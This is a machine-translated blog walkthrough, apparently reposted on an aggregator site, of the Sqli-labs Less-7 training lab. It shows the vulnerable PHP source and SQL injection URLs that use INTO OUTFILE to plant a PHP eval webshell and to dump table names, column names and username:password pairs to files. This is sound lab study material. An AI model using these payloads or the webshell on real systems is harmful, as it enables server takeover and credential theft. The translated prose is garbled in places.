Sqli-labs Less-7 using the import file for injection

Others 2020-04-09 22:07:55 views: null

The clearance is entitled dump into outfile, this means that none of our way to make use of the imported files are implanted. In the Background-3 we have learned how to use the dump into file.

First here or go back to the source code. Focus on the processing and sql statement id parameter, you can see from the source code

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}

Here the parameters of id ')) is performed.

Here we demonstrate that using the above mentioned imported files:

 

First, find the absolute path to the directory WEB

http://127.0.0.1/sql/Less-2/?id=-1%20union%20select%201,@@basedir,@@datadir%20--+

Here opportunistic, looking for a simple question Less-2 injected directly into the path to get, easy export.

 

http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\uuu.txt" %23

Image above sql wrong, but it does not matter, we can see uuu.txt has been generated in the file.

 

Like the above-mentioned background-3, we can directly imported into a word Trojan.

http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\test.php" --+ 

We can see in the file has been imported into a word Trojan

 

Test.php page views

This time with China knives and other management tools to connect to webshell

May file management, database management, etc.

For example, enter the file manager, you can manage all directories on the server's file

The rest will not repeat them.

 

There is another train of thought, you can directly query results written to the file, and then access this file.

Note that the file can not be an existing file

 

Write user library name, version number

http://127.0.0.1/sql/Less-7/?id=-1')) union select user(),database(),version() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\1.txt" --+ 

 

Write the name of the table

http://127.0.0.1/sql/Less-7/?id=-1')) union  select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\2.txt" --+ 

 

Write field names, table, for example to users

http://127.0.0.1/sql/Less-7/?id=-1'))  union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\3.txt" --+ 

 

Write to users table

http://127.0.0.1/sql/Less-7/?id=-1'))  union select 1,2,group_concat(username,0x3a,password) from users into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\4.txt" --+ 

 

From: https://www.cnblogs.com/lcamry/p/5763105.html

 

Guess you like

Origin www.cnblogs.com/zhengna/p/12575948.html
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com